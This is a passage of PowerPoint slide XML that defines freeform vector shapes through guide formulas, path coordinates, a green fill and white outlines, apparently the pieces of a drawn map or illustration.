                    <a:lnTo>
                      <a:pt x="419" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36286" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5035" y="3653"/>
                <a:ext cx="58" cy="62"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 32 w 58"/>
                  <a:gd name="T1" fmla="*/ 62 h 62"/>
                  <a:gd name="T2" fmla="*/ 28 w 58"/>
                  <a:gd name="T3" fmla="*/ 60 h 62"/>
                  <a:gd name="T4" fmla="*/ 20 w 58"/>
                  <a:gd name="T5" fmla="*/ 55 h 62"/>
                  <a:gd name="T6" fmla="*/ 16 w 58"/>
                  <a:gd name="T7" fmla="*/ 51 h 62"/>
                  <a:gd name="T8" fmla="*/ 13 w 58"/>
                  <a:gd name="T9" fmla="*/ 44 h 62"/>
                  <a:gd name="T10" fmla="*/ 9 w 58"/>
                  <a:gd name="T11" fmla="*/ 39 h 62"/>
                  <a:gd name="T12" fmla="*/ 8 w 58"/>
                  <a:gd name="T13" fmla="*/ 35 h 62"/>
                  <a:gd name="T14" fmla="*/ 9 w 58"/>
                  <a:gd name="T15" fmla="*/ 35 h 62"/>
                  <a:gd name="T16" fmla="*/ 11 w 58"/>
                  <a:gd name="T17" fmla="*/ 35 h 62"/>
                  <a:gd name="T18" fmla="*/ 14 w 58"/>
                  <a:gd name="T19" fmla="*/ 37 h 62"/>
                  <a:gd name="T20" fmla="*/ 15 w 58"/>
                  <a:gd name="T21" fmla="*/ 36 h 62"/>
                  <a:gd name="T22" fmla="*/ 13 w 58"/>
                  <a:gd name="T23" fmla="*/ 32 h 62"/>
                  <a:gd name="T24" fmla="*/ 8 w 58"/>
                  <a:gd name="T25" fmla="*/ 25 h 62"/>
                  <a:gd name="T26" fmla="*/ 4 w 58"/>
                  <a:gd name="T27" fmla="*/ 18 h 62"/>
                  <a:gd name="T28" fmla="*/ 3 w 58"/>
                  <a:gd name="T29" fmla="*/ 16 h 62"/>
                  <a:gd name="T30" fmla="*/ 0 w 58"/>
                  <a:gd name="T31" fmla="*/ 7 h 62"/>
                  <a:gd name="T32" fmla="*/ 0 w 58"/>
                  <a:gd name="T33" fmla="*/ 1 h 62"/>
                  <a:gd name="T34" fmla="*/ 1 w 58"/>
                  <a:gd name="T35" fmla="*/ 0 h 62"/>
                  <a:gd name="T36" fmla="*/ 8 w 58"/>
                  <a:gd name="T37" fmla="*/ 3 h 62"/>
                  <a:gd name="T38" fmla="*/ 19 w 58"/>
                  <a:gd name="T39" fmla="*/ 7 h 62"/>
                  <a:gd name="T40" fmla="*/ 27 w 58"/>
                  <a:gd name="T41" fmla="*/ 10 h 62"/>
                  <a:gd name="T42" fmla="*/ 32 w 58"/>
                  <a:gd name="T43" fmla="*/ 10 h 62"/>
                  <a:gd name="T44" fmla="*/ 36 w 58"/>
                  <a:gd name="T45" fmla="*/ 8 h 62"/>
                  <a:gd name="T46" fmla="*/ 39 w 58"/>
                  <a:gd name="T47" fmla="*/ 7 h 62"/>
                  <a:gd name="T48" fmla="*/ 41 w 58"/>
                  <a:gd name="T49" fmla="*/ 7 h 62"/>
                  <a:gd name="T50" fmla="*/ 46 w 58"/>
                  <a:gd name="T51" fmla="*/ 7 h 62"/>
                  <a:gd name="T52" fmla="*/ 48 w 58"/>
                  <a:gd name="T53" fmla="*/ 4 h 62"/>
                  <a:gd name="T54" fmla="*/ 53 w 58"/>
                  <a:gd name="T55" fmla="*/ 2 h 62"/>
                  <a:gd name="T56" fmla="*/ 57 w 58"/>
                  <a:gd name="T57" fmla="*/ 5 h 62"/>
                  <a:gd name="T58" fmla="*/ 57 w 58"/>
                  <a:gd name="T59" fmla="*/ 6 h 62"/>
                  <a:gd name="T60" fmla="*/ 58 w 58"/>
                  <a:gd name="T61" fmla="*/ 14 h 62"/>
                  <a:gd name="T62" fmla="*/ 58 w 58"/>
                  <a:gd name="T63" fmla="*/ 21 h 62"/>
                  <a:gd name="T64" fmla="*/ 52 w 58"/>
                  <a:gd name="T65" fmla="*/ 35 h 62"/>
                  <a:gd name="T66" fmla="*/ 51 w 58"/>
                  <a:gd name="T67" fmla="*/ 42 h 62"/>
                  <a:gd name="T68" fmla="*/ 50 w 58"/>
                  <a:gd name="T69" fmla="*/ 45 h 62"/>
                  <a:gd name="T70" fmla="*/ 43 w 58"/>
                  <a:gd name="T71" fmla="*/ 48 h 62"/>
                  <a:gd name="T72" fmla="*/ 39 w 58"/>
                  <a:gd name="T73" fmla="*/ 52 h 62"/>
                  <a:gd name="T74" fmla="*/ 35 w 58"/>
                  <a:gd name="T75" fmla="*/ 58 h 62"/>
                  <a:gd name="T76" fmla="*/ 34 w 58"/>
                  <a:gd name="T77" fmla="*/ 61 h 62"/>
                  <a:gd name="T78" fmla="*/ 32 w 58"/>
                  <a:gd name="T79" fmla="*/ 62 h 62"/>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58"/>
                  <a:gd name="T121" fmla="*/ 0 h 62"/>
                  <a:gd name="T122" fmla="*/ 58 w 58"/>
                  <a:gd name="T123" fmla="*/ 62 h 62"/>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58" h="62">
                    <a:moveTo>
                      <a:pt x="32" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="28" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36287" name="Freeform 19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4533" y="3117"/>
                <a:ext cx="642" cy="502"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 475 w 642"/>
                  <a:gd name="T1" fmla="*/ 27 h 502"/>
                  <a:gd name="T2" fmla="*/ 494 w 642"/>
                  <a:gd name="T3" fmla="*/ 58 h 502"/>
                  <a:gd name="T4" fmla="*/ 512 w 642"/>
                  <a:gd name="T5" fmla="*/ 84 h 502"/>
                  <a:gd name="T6" fmla="*/ 528 w 642"/>
                  <a:gd name="T7" fmla="*/ 134 h 502"/>
                  <a:gd name="T8" fmla="*/ 565 w 642"/>
                  <a:gd name="T9" fmla="*/ 157 h 502"/>
                  <a:gd name="T10" fmla="*/ 586 w 642"/>
                  <a:gd name="T11" fmla="*/ 196 h 502"/>
                  <a:gd name="T12" fmla="*/ 609 w 642"/>
                  <a:gd name="T13" fmla="*/ 220 h 502"/>
                  <a:gd name="T14" fmla="*/ 626 w 642"/>
                  <a:gd name="T15" fmla="*/ 242 h 502"/>
                  <a:gd name="T16" fmla="*/ 638 w 642"/>
                  <a:gd name="T17" fmla="*/ 287 h 502"/>
                  <a:gd name="T18" fmla="*/ 631 w 642"/>
                  <a:gd name="T19" fmla="*/ 358 h 502"/>
                  <a:gd name="T20" fmla="*/ 602 w 642"/>
                  <a:gd name="T21" fmla="*/ 409 h 502"/>
                  <a:gd name="T22" fmla="*/ 586 w 642"/>
                  <a:gd name="T23" fmla="*/ 459 h 502"/>
                  <a:gd name="T24" fmla="*/ 551 w 642"/>
                  <a:gd name="T25" fmla="*/ 483 h 502"/>
                  <a:gd name="T26" fmla="*/ 521 w 642"/>
                  <a:gd name="T27" fmla="*/ 496 h 502"/>
                  <a:gd name="T28" fmla="*/ 503 w 642"/>
                  <a:gd name="T29" fmla="*/ 487 h 502"/>
                  <a:gd name="T30" fmla="*/ 454 w 642"/>
                  <a:gd name="T31" fmla="*/ 486 h 502"/>
                  <a:gd name="T32" fmla="*/ 425 w 642"/>
                  <a:gd name="T33" fmla="*/ 454 h 502"/>
                  <a:gd name="T34" fmla="*/ 401 w 642"/>
                  <a:gd name="T35" fmla="*/ 436 h 502"/>
                  <a:gd name="T36" fmla="*/ 394 w 642"/>
                  <a:gd name="T37" fmla="*/ 413 h 502"/>
                  <a:gd name="T38" fmla="*/ 382 w 642"/>
                  <a:gd name="T39" fmla="*/ 420 h 502"/>
                  <a:gd name="T40" fmla="*/ 396 w 642"/>
                  <a:gd name="T41" fmla="*/ 389 h 502"/>
                  <a:gd name="T42" fmla="*/ 385 w 642"/>
                  <a:gd name="T43" fmla="*/ 391 h 502"/>
                  <a:gd name="T44" fmla="*/ 356 w 642"/>
                  <a:gd name="T45" fmla="*/ 420 h 502"/>
                  <a:gd name="T46" fmla="*/ 334 w 642"/>
                  <a:gd name="T47" fmla="*/ 383 h 502"/>
                  <a:gd name="T48" fmla="*/ 312 w 642"/>
                  <a:gd name="T49" fmla="*/ 364 h 502"/>
                  <a:gd name="T50" fmla="*/ 273 w 642"/>
                  <a:gd name="T51" fmla="*/ 358 h 502"/>
                  <a:gd name="T52" fmla="*/ 209 w 642"/>
                  <a:gd name="T53" fmla="*/ 370 h 502"/>
                  <a:gd name="T54" fmla="*/ 168 w 642"/>
                  <a:gd name="T55" fmla="*/ 398 h 502"/>
                  <a:gd name="T56" fmla="*/ 121 w 642"/>
                  <a:gd name="T57" fmla="*/ 401 h 502"/>
                  <a:gd name="T58" fmla="*/ 85 w 642"/>
                  <a:gd name="T59" fmla="*/ 417 h 502"/>
                  <a:gd name="T60" fmla="*/ 35 w 642"/>
                  <a:gd name="T61" fmla="*/ 409 h 502"/>
                  <a:gd name="T62" fmla="*/ 43 w 642"/>
                  <a:gd name="T63" fmla="*/ 376 h 502"/>
                  <a:gd name="T64" fmla="*/ 25 w 642"/>
                  <a:gd name="T65" fmla="*/ 305 h 502"/>
                  <a:gd name="T66" fmla="*/ 0 w 642"/>
                  <a:gd name="T67" fmla="*/ 254 h 502"/>
                  <a:gd name="T68" fmla="*/ 3 w 642"/>
                  <a:gd name="T69" fmla="*/ 250 h 502"/>
                  <a:gd name="T70" fmla="*/ 8 w 642"/>
                  <a:gd name="T71" fmla="*/ 239 h 502"/>
                  <a:gd name="T72" fmla="*/ 9 w 642"/>
                  <a:gd name="T73" fmla="*/ 194 h 502"/>
                  <a:gd name="T74" fmla="*/ 21 w 642"/>
                  <a:gd name="T75" fmla="*/ 189 h 502"/>
                  <a:gd name="T76" fmla="*/ 64 w 642"/>
                  <a:gd name="T77" fmla="*/ 163 h 502"/>
                  <a:gd name="T78" fmla="*/ 93 w 642"/>
                  <a:gd name="T79" fmla="*/ 150 h 502"/>
                  <a:gd name="T80" fmla="*/ 134 w 642"/>
                  <a:gd name="T81" fmla="*/ 130 h 502"/>
                  <a:gd name="T82" fmla="*/ 154 w 642"/>
                  <a:gd name="T83" fmla="*/ 93 h 502"/>
                  <a:gd name="T84" fmla="*/ 172 w 642"/>
                  <a:gd name="T85" fmla="*/ 99 h 502"/>
                  <a:gd name="T86" fmla="*/ 185 w 642"/>
                  <a:gd name="T87" fmla="*/ 91 h 502"/>
                  <a:gd name="T88" fmla="*/ 190 w 642"/>
                  <a:gd name="T89" fmla="*/ 77 h 502"/>
                  <a:gd name="T90" fmla="*/ 207 w 642"/>
                  <a:gd name="T91" fmla="*/ 54 h 502"/>
                  <a:gd name="T92" fmla="*/ 230 w 642"/>
                  <a:gd name="T93" fmla="*/ 54 h 502"/>
                  <a:gd name="T94" fmla="*/ 253 w 642"/>
                  <a:gd name="T95" fmla="*/ 66 h 502"/>
                  <a:gd name="T96" fmla="*/ 260 w 642"/>
                  <a:gd name="T97" fmla="*/ 57 h 502"/>
                  <a:gd name="T98" fmla="*/ 273 w 642"/>
                  <a:gd name="T99" fmla="*/ 39 h 502"/>
                  <a:gd name="T100" fmla="*/ 288 w 642"/>
                  <a:gd name="T101" fmla="*/ 22 h 502"/>
                  <a:gd name="T102" fmla="*/ 309 w 642"/>
                  <a:gd name="T103" fmla="*/ 12 h 502"/>
                  <a:gd name="T104" fmla="*/ 315 w 642"/>
                  <a:gd name="T105" fmla="*/ 10 h 502"/>
                  <a:gd name="T106" fmla="*/ 350 w 642"/>
                  <a:gd name="T107" fmla="*/ 24 h 502"/>
                  <a:gd name="T108" fmla="*/ 374 w 642"/>
                  <a:gd name="T109" fmla="*/ 23 h 502"/>
                  <a:gd name="T110" fmla="*/ 364 w 642"/>
                  <a:gd name="T111" fmla="*/ 40 h 502"/>
                  <a:gd name="T112" fmla="*/ 358 w 642"/>
                  <a:gd name="T113" fmla="*/ 70 h 502"/>
                  <a:gd name="T114" fmla="*/ 395 w 642"/>
                  <a:gd name="T115" fmla="*/ 93 h 502"/>
                  <a:gd name="T116" fmla="*/ 425 w 642"/>
                  <a:gd name="T117" fmla="*/ 112 h 502"/>
                  <a:gd name="T118" fmla="*/ 452 w 642"/>
                  <a:gd name="T119" fmla="*/ 76 h 502"/>
                  <a:gd name="T120" fmla="*/ 452 w 642"/>
                  <a:gd name="T121" fmla="*/ 42 h 502"/>
                  <a:gd name="T122" fmla="*/ 461 w 642"/>
                  <a:gd name="T123" fmla="*/ 4 h 502"/>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642"/>
                  <a:gd name="T187" fmla="*/ 0 h 502"/>
                  <a:gd name="T188" fmla="*/ 642 w 642"/>
                  <a:gd name="T189" fmla="*/ 502 h 502"/>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642" h="502">
                    <a:moveTo>
                      <a:pt x="465" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="469" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="475" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="487" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="526" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="564" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="597" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="632" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="559" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="533" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="487"/>
